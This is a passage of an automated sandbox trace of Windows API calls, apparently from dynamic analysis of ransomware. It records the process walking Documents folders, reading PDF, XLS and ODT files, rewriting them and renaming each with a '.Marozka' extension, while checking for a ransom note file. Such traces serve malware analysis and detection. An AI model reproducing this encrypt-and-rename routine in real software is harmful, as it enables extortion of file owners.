(dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0051.833] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD", lpFilePart=0x0) returned 0x51 [0051.833] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d908 [0051.834] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.834] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.834] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0051.834] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0051.834] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0051.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0051.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0051.835] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", lpFilePart=0x0) returned 0x68 [0051.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0051.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\emu 0kgi8cgxbrt7bz.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.835] GetFileType (hFile=0x2e0) returned 0x1 [0051.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0051.835] GetFileType (hFile=0x2e0) returned 0x1 [0051.835] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0xad36 [0051.835] ReadFile (in: hFile=0x2e0, lpBuffer=0x27ec13c, nNumberOfBytesToRead=0xad36, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x27ec13c*, lpNumberOfBytesRead=0x5be960*=0xad36, lpOverlapped=0x0) returned 1 [0051.835] CloseHandle (hObject=0x2e0) returned 1 [0051.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0051.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0051.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0051.992] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0051.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", lpFilePart=0x0) returned 0x68 [0051.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0051.992] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\emu 0kgi8cgxbrt7bz.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0051.994] GetFileType (hFile=0x2e0) returned 0x1 [0051.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0051.994] GetFileType (hFile=0x2e0) returned 0x1 [0051.994] WriteFile (in: hFile=0x2e0, lpBuffer=0x2664d60*, nNumberOfBytesToWrite=0xad40, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x2664d60*, lpNumberOfBytesWritten=0x5be954*=0xad40, lpOverlapped=0x0) returned 1 [0051.995] CloseHandle (hObject=0x2e0) returned 1 [0052.130] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf", lpFilePart=0x0) returned 0x68 [0052.130] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf.Marozka", lpFilePart=0x0) returned 0x70 [0052.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0052.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\emu 0kgi8cgxbrt7bz.pdf"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdef7f790, ftCreationTime.dwHighDateTime=0x1d4d536, ftLastAccessTime.dwLowDateTime=0xd23948b0, ftLastAccessTime.dwHighDateTime=0x1d4d487, ftLastWriteTime.dwLowDateTime=0xe1cd745b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xad40)) returned 1 [0052.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0052.130] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\emu 0kgi8cgxbrt7bz.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\EmU 0kgi8CgXbrt7bZ.pdf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\emu 0kgi8cgxbrt7bz.pdf.marozka")) returned 1 [0052.131] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", nBufferLength=0x105, lpBuffer=0x5be374, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", lpFilePart=0x0) returned 0x63 [0052.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8b8) returned 1 [0052.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\p1gfb-xnhupzn.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.131] GetFileType (hFile=0x2e0) returned 0x1 [0052.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8b4) returned 1 [0052.131] GetFileType (hFile=0x2e0) returned 0x1 [0052.131] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5be9b4 | out: lpFileSizeHigh=0x5be9b4*=0x0) returned 0xaf5a [0052.131] ReadFile (in: hFile=0x2e0, lpBuffer=0x26701d4, nNumberOfBytesToRead=0xaf5a, lpNumberOfBytesRead=0x5be960, lpOverlapped=0x0 | out: lpBuffer=0x26701d4*, lpNumberOfBytesRead=0x5be960*=0xaf5a, lpOverlapped=0x0) returned 1 [0052.131] CloseHandle (hObject=0x2e0) returned 1 [0052.165] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.165] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5be9a8 | out: lpFileInformation=0x5be9a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.165] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", nBufferLength=0x105, lpBuffer=0x5be360, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", lpFilePart=0x0) returned 0x63 [0052.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be8a4) returned 1 [0052.165] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\p1gfb-xnhupzn.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.166] GetFileType (hFile=0x2e0) returned 0x1 [0052.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be8a0) returned 1 [0052.167] GetFileType (hFile=0x2e0) returned 0x1 [0052.167] WriteFile (in: hFile=0x2e0, lpBuffer=0x26ddf50*, nNumberOfBytesToWrite=0xaf60, lpNumberOfBytesWritten=0x5be954, lpOverlapped=0x0 | out: lpBuffer=0x26ddf50*, lpNumberOfBytesWritten=0x5be954*=0xaf60, lpOverlapped=0x0) returned 1 [0052.168] CloseHandle (hObject=0x2e0) returned 1 [0052.170] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls", lpFilePart=0x0) returned 0x63 [0052.171] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls.Marozka", nBufferLength=0x105, lpBuffer=0x5be484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls.Marozka", lpFilePart=0x0) returned 0x6b [0052.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0052.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\p1gfb-xnhupzn.xls"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92745500, ftCreationTime.dwHighDateTime=0x1d4cd8c, ftLastAccessTime.dwLowDateTime=0xb7ca500, ftLastAccessTime.dwHighDateTime=0x1d4cb4f, ftLastWriteTime.dwLowDateTime=0xe1d4a41a, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xaf60)) returned 1 [0052.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0052.171] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\p1gfb-xnhupzn.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\eST84EqNkcxh_QHhN6r\\KJuNxs02AWf4HrD\\p1gFB-XnhuPzn.xls.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\est84eqnkcxh_qhhn6r\\kjunxs02awf4hrd\\p1gfb-xnhupzn.xls.marozka")) returned 1 [0052.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.172] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A", lpFilePart=0x0) returned 0x35 [0052.172] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d988 [0052.172] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.172] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.172] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.173] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.173] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.173] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0052.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.173] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A", lpFilePart=0x0) returned 0x35 [0052.173] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7db88 [0052.174] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.174] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.174] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.174] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.175] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.175] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0052.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.176] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", lpFilePart=0x0) returned 0x3f [0052.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.176] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\zj9t3-a\\s9hp9.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.176] GetFileType (hFile=0x2e0) returned 0x1 [0052.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.176] GetFileType (hFile=0x2e0) returned 0x1 [0052.176] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xa4f [0052.176] ReadFile (in: hFile=0x2e0, lpBuffer=0x26eb964, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x26eb964*, lpNumberOfBytesRead=0x5be9d4*=0xa4f, lpOverlapped=0x0) returned 1 [0052.176] CloseHandle (hObject=0x2e0) returned 1 [0052.334] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.334] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.335] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", lpFilePart=0x0) returned 0x3f [0052.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.335] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\zj9t3-a\\s9hp9.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.336] GetFileType (hFile=0x2e0) returned 0x1 [0052.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.336] GetFileType (hFile=0x2e0) returned 0x1 [0052.336] WriteFile (in: hFile=0x2e0, lpBuffer=0x273cd6c*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x5be99c, lpOverlapped=0x0 | out: lpBuffer=0x273cd6c*, lpNumberOfBytesWritten=0x5be99c*=0xa50, lpOverlapped=0x0) returned 1 [0052.337] CloseHandle (hObject=0x2e0) returned 1 [0052.338] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt", lpFilePart=0x0) returned 0x3f [0052.339] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt.Marozka", lpFilePart=0x0) returned 0x47 [0052.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\zj9t3-a\\s9hp9.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa2fa470, ftCreationTime.dwHighDateTime=0x1d4c92b, ftLastAccessTime.dwLowDateTime=0x7a0566c0, ftLastAccessTime.dwHighDateTime=0x1d4c75c, ftLastWriteTime.dwLowDateTime=0xe1ec71bc, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xa50)) returned 1 [0052.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.339] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\zj9t3-a\\s9hp9.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\7Y LgVnSbRJVo5KEQ0Q\\Zj9t3-A\\S9hp9.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\7y lgvnsbrjvo5keq0q\\zj9t3-a\\s9hp9.odt.marozka")) returned 1 [0052.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0052.341] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv", lpFilePart=0x0) returned 0x26 [0052.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d988 [0052.342] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) 